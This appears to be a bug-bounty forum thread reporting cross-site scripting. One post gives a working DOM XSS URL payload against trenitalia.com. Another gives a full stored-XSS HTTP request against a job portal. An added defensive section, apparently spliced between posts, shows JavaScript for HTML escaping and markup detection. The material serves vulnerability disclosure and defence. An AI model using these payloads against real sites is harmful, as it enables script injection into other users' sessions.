DOM XSS trenitalia.com

evaristegal0is
Posts:19
Joined:Mon Feb 20, 2017 5:14 pm
DOM XSS trenitalia.com

Post by evaristegal0is » Tue Jun 13, 2017 1:17 pm

There is a DOM XSS, visible in Chrome, on the site http://www.trenitalia.com
http://www.trenitalia.com/#"><img src=x onerror=prompt('OPENBUGBOUNTY')>

I tried to report it on OBB, but the site doesn't approve it for some reason.

x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: DOM XSS trenitalia.com

Post by x1admin » Wed Jun 14, 2017 10:20 am


Manojkhd
Posts:19
Joined:Thu Mar 19, 2020 3:48 pm

Re: DOM XSS trenitalia.com

Post by Manojkhd » Sun Apr 12, 2020 2:17 pm

Hello admin,
how can I submit such an example: parameter name="summary", which when checked on /Jobseeker/dashboard is reflected cross-site scripting (DOM-based)? :roll: PoC code:

POST /Jobseeker/updatePersonalDetail/38318 HTTP/1.1
Host: xxx.com.np
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.com.np/Jobseeker/editProfile
Cookie: mycookiename=252060169693efce0d5887f42afbba83bdde7479; _ga=GA1.3.1449882869.1586698060; _gid=GA1.3.1881890604.1586698060; _gat_gtag_UA_51173775_3=1; _gat_gtag_UA_137271813_1=1; _gat_gtag_UA_160188939_1=1
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1451056368887
Content-Length: 6572

-----------------------------1451056368887
Content-Disposition: form-data; name="email2"

[email protected]
-----------------------------1451056368887
Content-Disposition: form-data; name="summary"

<img src=x onerror=alert('openbugbounty')>
-----------------------------1451056368887
Content-Disposition: form-data; name="salutation"

14
-----------------------------1451056368887
Content-Disposition: form-data; name="fname"

Victim-Hacked
-----------------------------1451056368887
Content-Disposition: form-data; name="mname"

Firefox-gothacked
-----------------------------1451056368887
Content-Disposition: form-data; name="lname"

CSRF-Now
-----------------------------1451056368887
Content-Disposition: form-data; name="gender"

Female
-----------------------------1451056368887
Content-Disposition: form-data; name="mm"

9
-----------------------------1451056368887
Content-Disposition: form-data; name="dd"

10
-----------------------------1451056368887
Content-Disposition: form-data; name="yy"

1985
-----------------------------1451056368887
Content-Disposition: form-data; name="nationality"

31
-----------------------------1451056368887
Content-Disposition: form-data; name="phoneres"

035420132
-----------------------------1451056368887
Content-Disposition: form-data; name="phoneoff"

033332525
-----------------------------1451056368887
Content-Disposition: form-data; name="phonecell"

9800000001
-----------------------------1451056368887
Content-Disposition: form-data; name="phonecell2"

9801212120
-----------------------------1451056368887
Content-Disposition: form-data; name="maritalstatus"

Single
-----------------------------1451056368887
Content-Disposition: form-data; name="currentadd"

Old Road
-----------------------------1451056368887
Content-Disposition: form-data; name="currentcon"

HK
-----------------------------1451056368887
Content-Disposition: form-data; name="permanentadd"

NYC
-----------------------------1451056368887
Content-Disposition: form-data; name="permanentcon"

US
-----------------------------1451056368887
Content-Disposition: form-data; name="picture_previous"

29-Hotel-Icon-Has-Internet-5e8c09d5c86aa1.80624002.png
-----------------------------1451056368887
Content-Disposition: form-data; name="picture"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="citizenship_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="citizenship"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="latest_education_qualification"

bachelor
-----------------------------1451056368887
Content-Disposition: form-data; name="other_faculty"


-----------------------------1451056368887
Content-Disposition: form-data; name="slc_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="slc_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="docs_11_12_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="docs_11_12"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="bachelor_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="bachelor_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="masters_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="masters_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="other_docs_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="other_docs"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="workexp"

Yes
-----------------------------1451056368887
Content-Disposition: form-data; name="expyrs"

5
-----------------------------1451056368887
Content-Disposition: form-data; name="expmths"

1
-----------------------------1451056368887
Content-Disposition: form-data; name="cjobposiiton"

IT scurity- Pentesting openbugbounty
-----------------------------1451056368887
Content-Disposition: form-data; name="keyskills"

Pentesting Kali Linux great used after
-----------------------------1451056368887
Content-Disposition: form-data; name="preunit"

NPR
-----------------------------1451056368887
Content-Disposition: form-data; name="presal"

150000.00
-----------------------------1451056368887
Content-Disposition: form-data; name="expunit"

NPR
-----------------------------1451056368887
Content-Disposition: form-data; name="exptype"

Equals
-----------------------------1451056368887
Content-Disposition: form-data; name="expsal"

154
-----------------------------1451056368887
Content-Disposition: form-data; name="job_region"

296
-----------------------------1451056368887
Content-Disposition: form-data; name="joblocation"

92
-----------------------------1451056368887
Content-Disposition: form-data; name="joblocation2"

IT
-----------------------------1451056368887
Content-Disposition: form-data; name="funcarea1"

204
-----------------------------1451056368887
Content-Disposition: form-data; name="natureoforg1[]"

Security Providers
-----------------------------1451056368887
Content-Disposition: form-data; name="funcarea2"

269
-----------------------------1451056368887
Content-Disposition: form-data; name="natureoforg2[]"

Automobiles Sales & Services
-----------------------------1451056368887
Content-Disposition: form-data; name="natureoforg2[]"

IT-Hardware & Software Services
-----------------------------1451056368887
Content-Disposition: form-data; name="resume_previous"


-----------------------------1451056368887
Content-Disposition: form-data; name="resume"; filename=""
Content-Type: application/octet-stream


-----------------------------1451056368887
Content-Disposition: form-data; name="submit"


-----------------------------1451056368887--

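Both posts in this thread describe the same defect from the defender's side: an untrusted string (the URL fragment in the trenitalia.com report, the stored "summary" profile field in the job-portal request above) is written into the page as HTML instead of as text. The following is an added example, not code from either poster or from the sites mentioned; the function names, the minimal fragment parser and the "profile" record are assumptions, and the sample strings are constructed from the payloads already quoted in the thread. It contrasts what an innerHTML-style sink receives with what a text-style (escaped) sink receives, and adds a cheap check a team can use to log profile fields that look like markup before they ever reach a template.

```javascript
// Added example (not from the original thread): modelling the DOM XSS sink
// described above without a browser, so it runs under Node.

// Source 1 (first post): the URL fragment. Browsers expose location.hash with
// some characters percent-encoded; client code that does
// decodeURIComponent(location.hash.slice(1)) gets the raw string back.
// Assumption: this helper mimics that common pattern on a plain URL string.
function fragmentSource(url) {
  const i = url.indexOf('#');
  if (i < 0) return '';
  try {
    return decodeURIComponent(url.slice(i + 1));
  } catch (e) {
    return url.slice(i + 1); // malformed %-sequence: use it undecoded
  }
}

// Source 2 (second post): a stored profile field rendered on the dashboard.
// Assumption: the profile is a plain object keyed by form field name.
function profileFieldSource(profile, field) {
  return typeof profile[field] === 'string' ? profile[field] : '';
}

// The vulnerable sink: element.innerHTML = value. The string reaches the HTML
// parser unchanged, so "<img ... onerror=...>" becomes a live element.
function renderUnsafe(value) {
  return value; // what innerHTML would receive
}

// The hardened sink: escape the five HTML-significant characters, which is
// what element.textContent = value effectively does. Markup becomes text.
function escapeHtml(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
function renderSafe(value) {
  return escapeHtml(value);
}

// Server-side / logging check: does a free-text field contain something that
// would be interpreted as a tag or an event handler? This is for alerting and
// review, not a substitute for escaping at the sink.
function looksLikeMarkup(value) {
  return /<\s*[a-z!\/]/i.test(value) || /\bon[a-z]+\s*=/i.test(value);
}

// Constructed samples, taken from the strings quoted in the thread.
const SAMPLE_URL =
  "http://www.trenitalia.com/#\"><img src=x onerror=prompt('OPENBUGBOUNTY')>";
const SAMPLE_PROFILE = {
  summary: "<img src=x onerror=alert('openbugbounty')>",
  currentadd: 'Old Road',
};

const fragment = fragmentSource(SAMPLE_URL);
console.log('innerHTML sink receives :', renderUnsafe(fragment));
console.log('textContent sink receives:', renderSafe(fragment));
for (const field of Object.keys(SAMPLE_PROFILE)) {
  const v = profileFieldSource(SAMPLE_PROFILE, field);
  console.log(`${field}: markup-like=${looksLikeMarkup(v)} -> ${renderSafe(v)}`);
}
```

The point of the contrast is that the fix is at the sink, not at the source: the dashboard cannot know which of its hundreds of stored fields a user filled with markup, but rendering every field via textContent (or a templating engine that escapes by default) makes the question moot, and the logging check tells the team which accounts to look at.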
x1admin
Site Admin
Posts:3101
Joined:Sun Nov 15, 2015 7:04 pm

Re: DOM XSS trenitalia.com

Post by x1admin » Mon Apr 13, 2020 7:18 am

Our report form has examples.
